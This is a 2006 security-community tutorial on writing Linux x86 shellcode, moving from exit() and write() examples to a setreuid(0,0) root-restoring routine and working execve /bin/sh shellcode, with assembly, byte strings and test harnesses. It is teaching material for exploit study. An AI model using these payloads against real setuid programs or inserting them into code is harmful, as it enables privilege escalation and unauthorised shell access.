Gotfault Security Community
                                  (GSC)
 
 
---------[ Chapter : 0x900                                             ]
---------[ Subject : Basic Shellcode Writing                           ]
---------[ Author  : dx A.K.A. Thyago Silva                            ]
---------[ Date    : 04/02/2006                                        ]
---------[ Version : 1.0                                               ]
 
 
|=--------------------------------------------------------------------------=|
 
---------[ Table of Contents ]
 
  0x910 - Objective
  0x920 - Requisites
  0x930 - Introduction to Shellcode
  0x940 - Linux System Calls
  0x950 - X86 Registers
  0x960 - Common Assembly Instructions
  0x970 - write() Example
  0x980 - setreuid() Example
  0x990 - execve() Example
  0x9a0 - Conclusion


|=--------------------------------------------------------------------------=|
 
---------[ 0x910 - Objective ]

This paper is an introduction to writing shellcode.

---------[ 0x920 - Requisites ]

Basic knowledge of C and assembly, and some experience with tools such as gdb
and objdump, is required.

---------[ 0x930 - Introduction to Shellcode ]

Shellcode is a small piece of machine code that is injected into a running
program and executed there. The name comes from its classic purpose, spawning
a shell, but not all shellcode does so: the term has become a generic name for
any bit of position independent machine code that can be directly executed by
the CPU. Shellcode is usually delivered as a C string, so it cannot contain
any NULL bytes: a NULL stops the reading of the string and everything after it
is lost. Shellcode execution can be triggered by overwriting a return address
on the stack with the address of the injected shellcode.


---------[ 0x940 - Linux System Calls ]

In addition to the raw assembly instructions provided by the processor, Linux
provides the programmer with a set of kernel functions that can be invoked
from assembly. These are known as system calls, and on x86 they are triggered
with the software interrupt 0x80. The system call numbers are listed in
/usr/include/asm/unistd.h.

With a handful of assembly instructions and the system calls listed in
unistd.h, many different assembly programs and pieces of bytecode can be
written.
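
The idea of calling the kernel by number can also be tried from C. The sketch
below assumes a Linux system with glibc, whose syscall() function takes a
system call number followed by its arguments. The name raw_getpid is made up
for this illustration. The SYS_ constants come from the headers of whatever
architecture you compile for, so their values may differ from the i386
numbers used in this paper.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sys/syscall.h>   /* SYS_getpid and the other SYS_ numbers */
#include <unistd.h>        /* syscall(), getpid() */

/* Ask the kernel for our process ID by system call number,
 * bypassing the getpid() library wrapper. */
long raw_getpid(void)
{
    long pid = syscall(SYS_getpid);
    assert(pid > 0);       /* getpid never fails */
    return pid;
}
```

The value returned should match what the ordinary getpid() wrapper reports.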

---------[ 0x950 - X86 Registers ]

Registers are temporary storage locations used to hold data, addresses, or
the results of calculations. They are storage cells located on the CPU itself,
which makes access to their values extremely fast, because the CPU doesn't
have to access a location outside of itself.

The x86 has 32 bit general purpose registers whose lower parts can also be
addressed as 16 bit and 8 bit registers.

        32 Bit    16 Bit    8 Bit (High)    8 Bit (Low)
        -----------------------------------------------
        EAX       AX        AH              AL
        EBX       BX        BH              BL
        ECX       CX        CH              CL
        EDX       DX        DH              DL

EAX, AX, AH and AL:

	* Are called the "Accumulator" registers.

EBX, BX, BH, and BL:

	* Are the "Base" registers.

ECX, CX, CH, and CL:

	* Are also known as the "Counter" registers.

EDX, DX, DH, and DL:

	* Are called the "Data" registers.
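
How the smaller names overlap the 32 bit register can be modelled with plain
bit arithmetic. This is only a sketch in C, not real register access, and the
function names are invented for the illustration. The last function models
what an instruction such as "mov $0x1, %al" does: only the low byte changes.

```c
#include <assert.h>
#include <stdint.h>

/* Low 16 bits of a 32 bit register value (what AX sees of EAX). */
uint16_t low16(uint32_t eax) { return (uint16_t)(eax & 0xFFFFu); }

/* Bits 8..15 (AH) and bits 0..7 (AL). */
uint8_t high8(uint32_t eax) { return (uint8_t)((eax >> 8) & 0xFFu); }
uint8_t low8(uint32_t eax)  { return (uint8_t)(eax & 0xFFu); }

/* Model a write to AL: replace the low byte, keep everything else. */
uint32_t write_low8(uint32_t eax, uint8_t value)
{
    uint32_t result = (eax & 0xFFFFFF00u) | value;
    assert((result >> 8) == (eax >> 8));   /* upper 24 bits untouched */
    return result;
}
```

For example, write_low8(0xdeadbeef, 0x01) gives 0xdeadbe01, not 0x00000001.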

To execute a system call, you load these registers with the system call number
and its arguments. A very simple example is exit(0):

[xgc@knowledge:~/shellcode]$ more exit.s
.section        .text

        .global _start

        _start:

        mov	$0x1, %al  # syscall number for exit
        xorl	%ebx, %ebx # zero out EBX register
        int 	$0x80      # changes to kernel mode

Assemble.

[xgc@knowledge:~/shellcode]$ as -o exit.o exit.s

Link.

[xgc@knowledge:~/shellcode]$ ld -o exit exit.o

Trace and disassemble.

[xgc@knowledge:~/shellcode]$ strace ./exit
execve("./exit", ["./exit"], [/* 18 vars */]) = 0
_exit(0)                                = ?
[xgc@knowledge:~/shellcode]$ objdump -d exit

exit:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       b0 01                   mov    $0x1,%al
 8048076:       31 db                   xor    %ebx,%ebx
 8048078:       cd 80                   int    $0x80


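It is important to always use the smallest register that can hold your data.
This avoids NULL bytes in the shellcode. Keep in mind that writing to AL
leaves the upper 24 bits of EAX untouched, so the code above works only
because EAX happens to be zero when the process starts. Injected shellcode
cannot rely on that, which is why the later examples clear the register
first. For comparison, here is the same exit code using the full 32 bit
register: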

[xgc@knowledge:~/shellcode]$ more exit.s
.section        .text

        .global _start

        _start:

        movl 	$0x1, %eax # syscall number for exit
        xorl 	%ebx, %ebx # zero out EBX register
        int  	$0x80      # changes to kernel mode

Assemble.

[xgc@knowledge:~/shellcode]$ as -o exit.o exit.s

Link.

[xgc@knowledge:~/shellcode]$ ld -o exit exit.o

Trace.

[xgc@knowledge:~/shellcode]$ strace ./exit
execve("./exit", ["./exit"], [/* 18 vars */]) = 0
_exit(0)                                = ?

The value 1 is now encoded as a full 32 bit immediate, so its three unused
upper bytes show up as NULL bytes in the resulting shellcode:

[xgc@knowledge:~/shellcode]$ objdump -d exit

exit:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       b8 01 00 00 00          mov    $0x1,%eax
 8048079:       31 db                   xor    %ebx,%ebx
 804807b:       cd 80                   int    $0x80
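
Checking a byte sequence for NULLs by eye gets tedious, so here is a small
helper, written as a sketch. The function name and the two array names are
invented for this example; the bytes themselves are copied from the two
objdump listings in this section.

```c
#include <assert.h>
#include <stddef.h>

/* Return the offset of the first 0x00 byte in code[0..len),
 * or -1 if the buffer contains none. */
long first_null_offset(const unsigned char *code, size_t len)
{
    assert(code != NULL);
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0x00)
            return (long)i;
    }
    return -1;
}

/* exit(0) using "mov $0x1, %al" */
const unsigned char exit_al[]  = { 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80 };

/* exit(0) using "movl $0x1, %eax" */
const unsigned char exit_eax[] = { 0xb8, 0x01, 0x00, 0x00, 0x00,
                                   0x31, 0xdb, 0xcd, 0x80 };
```

Called on exit_al the function returns -1. Called on exit_eax it returns 2,
the offset of the first of the three padding bytes.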


---------[ 0x960 - Common Assembly Instructions ]

The following are some instructions that will be used in the construction of
shellcode.

------------------------------------------------------------------------------------
Instruction     Name / Syntax           Description
------------------------------------------------------------------------------------
MOV             Move instruction        Used to copy values
                mov src, dest           Copy the value in src into dest
------------------------------------------------------------------------------------
ADD             Add instruction         Used to add values
                add src, dest           Add the value in src to dest
------------------------------------------------------------------------------------
SUB             Subtract instruction    Used to subtract values
                sub src, dest           Subtract the value in src from dest
------------------------------------------------------------------------------------
PUSH            Push instruction        Used to push values onto the stack
                push target             Push the value in target onto the stack
------------------------------------------------------------------------------------
POP             Pop instruction         Used to pop values from the stack
                pop target              Pop a value from the stack into target
------------------------------------------------------------------------------------
JMP             Jump instruction        Used to change the EIP to a certain address
                jmp address             Change the EIP to the address in address
------------------------------------------------------------------------------------
CALL            Call instruction        Used like a function call
                call address            Push the address of the next instruction
                                        onto the stack, then change the EIP to the
                                        address in address
------------------------------------------------------------------------------------
LEA             Load effective address  Used to get the address of a piece of memory
                lea src, dest           Load the address of src into dest
------------------------------------------------------------------------------------
INT             Interrupt instruction   Used to raise a software interrupt
                int value               Raise interrupt number value; 0x80 enters
                                        the Linux kernel for a system call
------------------------------------------------------------------------------------


---------[ 0x970 - write() Example ]

Now some shellcode to print a string.

[xgc@knowledge:~/shellcode]$ man 2 write

WRITE(2)                   Linux Programmer's Manual                  WRITE(2)

NAME
       write - write to a file descriptor

SYNOPSIS
       #include <unistd.h>

       ssize_t write(int fd, const void *buf, size_t count);

DESCRIPTION
       write  writes  up  to  count  bytes  to the file referenced by the file
       descriptor fd from the buffer starting at buf.  POSIX requires  that  a
       read()  which  can  be  proved  to  occur  after a write() has returned
       returns the new data.  Note that not all file systems  are  POSIX  con-
       forming.


It takes the file descriptor as the first argument, which is an integer.
The standard output device is 1, so to print to the terminal (STDOUT), this
argument should be 1. 

The second argument is a pointer to a character buffer containing the string to
be written.

The final argument is the number of bytes to write from this buffer.

[xgc@knowledge:~/shellcode]$ grep __NR_write /usr/include/asm/unistd.h
#define __NR_write                4

[xgc@knowledge:~/shellcode]$ grep __NR_exit /usr/include/asm/unistd.h
#define __NR_exit                 1


        write(int fd, const void *buf, size_t count);
        ---------------------------------------------
        EAX   EBX     ECX              EDX

	
	xorl	%ebx, %ebx	# zero out EBX register

The value of 4 needs to be put into the EAX register, because the write()
function is system call number 4.

	push	$0x4		# push the write syscall number onto the stack
	popl	%eax		# pop it into the EAX register
	
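The address of the string needs to be put into ECX. The string is built on the
stack rather than in a data segment, so no fixed address is needed. write()
takes an explicit length and does not need NULL termination, but since EBX = 0
a terminator can be pushed first anyway:

	pushl	%ebx		# push 0 (string terminator) onto the stack
	pushl	$0x0a0d4141	# push "AA\r\n" (stored little-endian)
	movl    %esp, %ecx      # ECX = ESP, the address of the string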
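
Working out such an immediate by hand is error prone, because x86 stores the
least significant byte first. The helper below is a sketch that does the
packing for a four character string. The name pack_le32 is an invention of
this example, not part of any library.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Pack exactly four characters into the 32 bit immediate that, once
 * pushed on a little-endian x86 stack, reads back in memory as
 * s[0] s[1] s[2] s[3]. */
uint32_t pack_le32(const char *s)
{
    assert(s != NULL && strlen(s) == 4);
    const unsigned char *b = (const unsigned char *)s;
    return (uint32_t)b[0]
         | (uint32_t)b[1] << 8
         | (uint32_t)b[2] << 16
         | (uint32_t)b[3] << 24;
}
```

pack_le32("AA\r\n") gives 0x0a0d4141, the value pushed above: the first
character of the string ends up in the lowest byte of the immediate.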

Then the value of 1 needs to be put into EBX, because the first argument of
write() is an integer representing the file descriptor (in this case, it is
the standard output device, which is 1).

	incl	%ebx		# increment EBX by 1

And finally, the length of this string (in this case, 4) needs to be put into
EDX.

        push    $0x4            # push the length (4) onto the stack
        popl    %edx            # pop it into the EDX register


After these registers are loaded, the system call interrupt is called,
which will call the write() function.

	int	$0x80		# changes to kernel mode

To exit cleanly, the exit() function needs to be called, and it should take a
single argument of 0. So the value of 1 needs to be put into EAX, because
exit() is system call number 1.

	xorl	%eax, %eax	# zero out EAX register
	incl	%eax		# increment EAX by 1

And the value of 0 needs to be put into EBX, because the first and only argument
should be 0. Then the system call interrupt should be called one last time.

	xorl	%ebx, %ebx	# zero out EBX register
	int	$0x80		# changes to kernel mode
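
For comparison, the write() part can be expressed in C with the arguments in
the same order as the registers. This is a sketch assuming Linux and glibc's
syscall() function; emit_message is a made-up name, and the file descriptor
is a parameter so that the function is easy to try on something other than
the terminal.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sys/syscall.h>   /* SYS_write */
#include <unistd.h>        /* syscall() */

/* Same order as the registers: number (EAX), then fd (EBX),
 * buf (ECX) and count (EDX).
 * Returns the number of bytes written, or -1 on error. */
long emit_message(int fd)
{
    static const char msg[] = "AA\r\n";     /* 4 bytes plus the NULL */
    assert(sizeof msg - 1 == 4);
    return syscall(SYS_write, fd, msg, (size_t)4);
}
```

Calling emit_message(1) prints the string on standard output and returns 4,
the same result strace reports for the assembly version.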

So assemble, link, strace, execute and disassemble it.

[xgc@knowledge:~/shellcode]$ as write.s -o write.o
[xgc@knowledge:~/shellcode]$ ld write.o -o write
[xgc@knowledge:~/shellcode]$ strace ./write
execve("./write", ["./write"], [/* 18 vars */]) = 0
write(1, "AA\r\n", 4AA
)                   = 4
_exit(0)                                = ?
[xgc@knowledge:~/shellcode]$ ./write
AA
[xgc@knowledge:~/shellcode]$ objdump -d ./write

./write:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 db                   xor    %ebx,%ebx
 8048076:       6a 04                   push   $0x4
 8048078:       58                      pop    %eax
 8048079:       53                      push   %ebx
 804807a:       68 41 41 0d 0a          push   $0xa0d4141
 804807f:       89 e1                   mov    %esp,%ecx
 8048081:       43                      inc    %ebx
 8048082:       6a 04                   push   $0x4
 8048084:       5a                      pop    %edx
 8048085:       cd 80                   int    $0x80
 8048087:       31 c0                   xor    %eax,%eax
 8048089:       31 db                   xor    %ebx,%ebx
 804808b:       40                      inc    %eax
 804808c:       cd 80                   int    $0x80
[xgc@knowledge:~/shellcode]$

Build the shellcode string from the disassembly: every opcode byte becomes a
'\x' escape in a C string. The result:

  "\x31\xdb"                    // xor  %ebx, %ebx
  "\x6a\x04"                    // push $0x4
  "\x58"                        // pop  %eax
  "\x53"                        // push %ebx
  "\x68\x41\x41\x0d\x0a"        // push $0x0a0d4141
  "\x89\xe1"                    // mov  %esp, %ecx
  "\x43"                        // inc  %ebx
  "\x6a\x04"                    // push $0x4
  "\x5a"                        // pop  %edx
  "\xcd\x80"                    // int  $0x80
  "\x31\xc0"                    // xor  %eax, %eax
  "\x31\xdb"                    // xor  %ebx, %ebx
  "\x40"                        // inc  %eax
  "\xcd\x80";                   // int  $0x80

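Typing the escapes by hand invites mistakes, so the conversion from raw bytes
to '\x' text can be scripted. The function below is a sketch; its name and
its return convention are choices made for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/* Write code[0..len) into out as "\xNN\xNN..." text.
 * Each byte takes four characters. Returns the number of characters
 * written (not counting the terminating NULL), or -1 if out is too
 * small to hold the result. */
int format_c_escapes(const unsigned char *code, size_t len,
                     char *out, size_t outsz)
{
    assert(code != NULL && out != NULL);
    if (outsz < len * 4 + 1)
        return -1;
    out[0] = '\0';                          /* covers len == 0 */
    for (size_t i = 0; i < len; i++)
        snprintf(out + i * 4, 5, "\\x%02x", code[i]);
    return (int)(len * 4);
}
```

Given the two bytes 0x31 0xdb and a large enough buffer, it produces the
eight characters \x31\xdb, ready to be pasted between double quotes.
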
Put it in a test file, compile and run it.

[xgc@knowledge:~/shellcode]$ more write.c
#include <stdio.h>
#include <string.h>

char shellcode[] =

  "\x31\xdb"                    // xor  %ebx, %ebx
  "\x6a\x04"                    // push $0x4
  "\x58"                        // pop  %eax
  "\x53"                        // push %ebx
  "\x68\x41\x41\x0d\x0a"        // push $0x0a0d4141
  "\x89\xe1"                    // mov  %esp, %ecx
  "\x43"                        // inc  %ebx
  "\x6a\x04"                    // push $0x4
  "\x5a"                        // pop  %edx
  "\xcd\x80"                    // int  $0x80
  "\x31\xc0"                    // xor  %eax, %eax
  "\x31\xdb"                    // xor  %ebx, %ebx
  "\x40"                        // inc  %eax
  "\xcd\x80";                   // int  $0x80

int main() {

        int (*f)() = (int(*)())shellcode;
        printf("Length: %zu\n", strlen(shellcode));
        f();
}
[xgc@knowledge:~/shellcode]$ gcc -o write write.c
[xgc@knowledge:~/shellcode]$ ./write
Length: 26
AA
[xgc@knowledge:~/shellcode]$


---------[ 0x980 - setreuid() Example ]


[xgc@knowledge:~/shellcode]$ man setreuid

SETREUID(2)                Linux Programmer's Manual               SETREUID(2)

NAME
       setreuid, setregid - set real and/or effective user or group ID

SYNOPSIS
       #include <sys/types.h>
       #include <unistd.h>

       int setreuid(uid_t ruid, uid_t euid);
       int setregid(gid_t rgid, gid_t egid);

DESCRIPTION
       setreuid sets real and effective user IDs of the current process.

Sometimes we need "privilege restoration routines": code that gives a process
its root privileges back when the program has temporarily given them up for
security reasons. These routines are especially useful for exploiting
vulnerabilities in setuid binaries that lower their privileges for a while but
do not drop them completely. setreuid() is one such routine: it sets the
process' real and effective user IDs.

[xgc@knowledge:~/shellcode]$ grep __NR_setreuid /usr/include/asm/unistd.h
#define __NR_setreuid            70

We set EAX to 0x46 (70), the setreuid system call number,

	push	$0x46		# push the setreuid syscall number onto the stack
	popl	%eax		# pop it into the EAX register

EBX to the real user ID (0 for root),

	xorl	%ebx, %ebx	# zero out EBX register

and ECX to the effective user ID (also 0).

	xorl	%ecx, %ecx	# zero out ECX register

	int	$0x80		# changes to kernel mode
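
The same request written in C is a single call. The sketch below wraps it so
the outcome is easy to inspect; restore_root_ids is a name invented for this
example.

```c
#include <assert.h>
#include <errno.h>
#include <unistd.h>

/* Try to set both the real and the effective user ID to 0 (root).
 * Returns 0 on success, or the errno value (for example EPERM)
 * when the process is not allowed to do so. */
int restore_root_ids(void)
{
    if (setreuid(0, 0) == 0)
        return 0;
    assert(errno != 0);
    return errno;
}
```

Run from an ordinary user account with no saved root ID, the call is refused
and the function returns EPERM. It can only succeed in a process that still
holds root in one of its IDs, such as a setuid root binary.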

To exit cleanly, the exit() function needs to be called, and it should take a
single argument of 0. So the value of 1 needs to be put into EAX, because
exit() is system call number 1.

	xorl	%eax, %eax	# zero out EAX register
	incl	%eax		# increment EAX by 1

And the value of 0 needs to be put into EBX, because the first and only argument
should be 0. Then the system call interrupt should be called one last time.

	xorl	%ebx, %ebx	# zero out EBX register
	int	$0x80		# changes to kernel mode

So assemble, link, strace, execute and disassemble it.

[xgc@knowledge:~/shellcode]$ as setreuid.s -o setreuid.o
[xgc@knowledge:~/shellcode]$ ld setreuid.o -o setreuid
[xgc@knowledge:~/shellcode]$ strace ./setreuid
execve("./setreuid", ["./setreuid"], [/* 18 vars */]) = 0
setreuid(0, 0)                          = -1 EPERM (Operation not permitted)
_exit(0)                                = ?
[xgc@knowledge:~/shellcode]$ ./setreuid
[xgc@knowledge:~/shellcode]$ objdump -d ./setreuid

./setreuid:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       6a 46                   push   $0x46
 8048076:       58                      pop    %eax
 8048077:       31 db                   xor    %ebx,%ebx
 8048079:       31 c9                   xor    %ecx,%ecx
 804807b:       cd 80                   int    $0x80
 804807d:       31 c0                   xor    %eax,%eax
 804807f:       40                      inc    %eax
 8048080:       31 db                   xor    %ebx,%ebx
 8048082:       cd 80                   int    $0x80
[xgc@knowledge:~/shellcode]$


---------[ 0x990 - execve() Example ]

[xgc@knowledge:~/shellcode]$ man execve

EXECVE(2)                  Linux Programmer's Manual                 EXECVE(2)

NAME
       execve - execute program

SYNOPSIS
       #include <unistd.h>

       int  execve(const  char  *filename,  char  *const  argv [], char *const
       envp[]);

This is the sweetest part. Based on what we've learned so far, let's write
shellcode that spawns an interactive shell.

There's no need for an exit() call here: when execve() succeeds it does not
return, because the calling program is replaced by the new one.

EBX holds the address of the filename, ECX the address of argv[] and EDX the
address of envp[]. The last two are arrays of pointers to strings. The
environment can be NULL, which means we can have a zero in EDX. For argv[],
however, we need to supply at least argv[0], the name of the program. Since
argv[] is NULL terminated, argv[1] will be zero. So we'll need to:

    * have the string "/bin/sh" somewhere in memory
    * write the address of that string into EBX
    * create a char ** array which holds the address of "/bin/sh" followed
      by a NULL pointer
    * write the address of that array into ECX
    * write zero into EDX
    * write the execve system call number into EAX
    * trigger the interrupt to enter kernel mode
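
The argument array from the list above is tiny, and seeing it in C may help
before building it on the stack. This is only a sketch of the layout;
fill_argv is a made-up name.

```c
#include <assert.h>
#include <stddef.h>

/* Fill a two slot argument vector for a program started with no
 * arguments: argv[0] is the program path, argv[1] is the NULL
 * pointer that terminates the array. */
void fill_argv(char *path, char *argv[2])
{
    assert(path != NULL && argv != NULL);
    argv[0] = path;
    argv[1] = NULL;
}
```

The filled array is what gets passed as the second argument, as in
execve(path, argv, NULL). The assembly version has to produce the same two
pointers in memory and leave their address in ECX.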


First write a NULL terminated "/bin/sh" into memory. The stack grows toward
lower addresses, so we push the terminating NULL first and the string after
it, last four bytes first.

Create a NULL in EAX. This will be used for terminating the string:

	xorl	%eax, %eax

Push that zero (NULL) onto the stack:

	pushl	%eax

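Push "//sh". The doubled slash pads the path to eight bytes, so it fills two
4 byte pushes exactly; "/bin//sh" names the same file as "/bin/sh":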

	pushl	$0x68732f2f

Push "/bin":

	pushl	$0x6e69622f
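
That "/bin//sh" names the same file as "/bin/sh" can be checked from C by
comparing what stat() reports for two spellings of a path. A sketch, assuming
a POSIX system; same_file is a helper invented for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/stat.h>

/* Return 1 if both paths resolve to the same file (same device and
 * inode), 0 if they differ, -1 if either path cannot be examined. */
int same_file(const char *a, const char *b)
{
    struct stat sa, sb;
    assert(a != NULL && b != NULL);
    if (stat(a, &sa) != 0 || stat(b, &sb) != 0)
        return -1;
    return sa.st_dev == sb.st_dev && sa.st_ino == sb.st_ino;
}
```

On a system where /bin/sh exists, same_file("/bin/sh", "/bin//sh") returns 1,
because repeated slashes inside a path are treated as a single one.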

At this moment, ESP points at the starting address of "/bin//sh". We can safely
write this into EBX:

	movl 	%esp, %ebx

EAX is still zero. We can use this to terminate char **argv:

	pushl	%eax

If we now push the address of "/bin//sh" as well, ESP will point at a two
element array: the address of the string followed by a NULL pointer. That
array is our char **argv, created in memory:

	pushl	%ebx

And write the address of argv into ECX:

	movl 	%esp, %ecx

EDX may happily be zero.

	xorl 	%edx, %edx

The execve system call number is 0xb (11). That should be in EAX. The upper
bytes of EAX are still zero, so writing AL is enough:

	movb 	$0xb, %al

Trigger the interrupt and enter kernel mode:

	int	$0x80

So assemble, link, execute and disassemble it.

[xgc@knowledge:~/shellcode]$ as execve.s -o execve.o
[xgc@knowledge:~/shellcode]$ ld execve.o -o execve
[xgc@knowledge:~/shellcode]$ ./execve
sh-2.05b$ exit
exit
[xgc@knowledge:~/shellcode]$ objdump -d ./execve

./execve:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 c0                   xor    %eax,%eax
 8048076:       50                      push   %eax
 8048077:       68 2f 2f 73 68          push   $0x68732f2f
 804807c:       68 2f 62 69 6e          push   $0x6e69622f
 8048081:       89 e3                   mov    %esp,%ebx
 8048083:       50                      push   %eax
 8048084:       53                      push   %ebx
 8048085:       89 e1                   mov    %esp,%ecx
 8048087:       31 d2                   xor    %edx,%edx
 8048089:       b0 0b                   mov    $0xb,%al
 804808b:       cd 80                   int    $0x80
[xgc@knowledge:~/shellcode]$

Build the shellcode string from the disassembly: every opcode byte becomes a
'\x' escape in a C string. The result:

  "\x31\xc0"                    // xor    %eax, %eax
  "\x50"                        // push   %eax
  "\x68\x2f\x2f\x73\x68"        // push   $0x68732f2f
  "\x68\x2f\x62\x69\x6e"        // push   $0x6e69622f
  "\x89\xe3"                    // mov    %esp, %ebx
  "\x50"                        // push   %eax
  "\x53"                        // push   %ebx
  "\x89\xe1"                    // mov    %esp, %ecx
  "\x31\xd2"                    // xor    %edx, %edx
  "\xb0\x0b"                    // mov    $0xb, %al
  "\xcd\x80";                   // int    $0x80

Put it in a test file, compile and run:

[xgc@knowledge:~/shellcode]$ more execve.c
#include <stdio.h>
#include <string.h>

char shellcode[] =

  "\x31\xc0"                    // xor    %eax, %eax
  "\x50"                        // push   %eax
  "\x68\x2f\x2f\x73\x68"        // push   $0x68732f2f
  "\x68\x2f\x62\x69\x6e"        // push   $0x6e69622f
  "\x89\xe3"                    // mov    %esp, %ebx
  "\x50"                        // push   %eax
  "\x53"                        // push   %ebx
  "\x89\xe1"                    // mov    %esp, %ecx
  "\x31\xd2"                    // xor    %edx, %edx
  "\xb0\x0b"                    // mov    $0xb, %al
  "\xcd\x80";                   // int    $0x80

int main() {

        int (*f)() = (int(*)())shellcode;
        printf("Length: %zu\n", strlen(shellcode));
        f();
}

[xgc@knowledge:~/shellcode]$ gcc -o execve execve.c
[xgc@knowledge:~/shellcode]$ ./execve
Length: 25
sh-2.05b$


---------[ 0x9a0 - Conclusion ]

There are many ways to make shellcode smaller, and with shellcode the
smaller the better.

Using the logic shown here, anyone can construct millions of fantastic
shellcodes. All it takes is a little attention.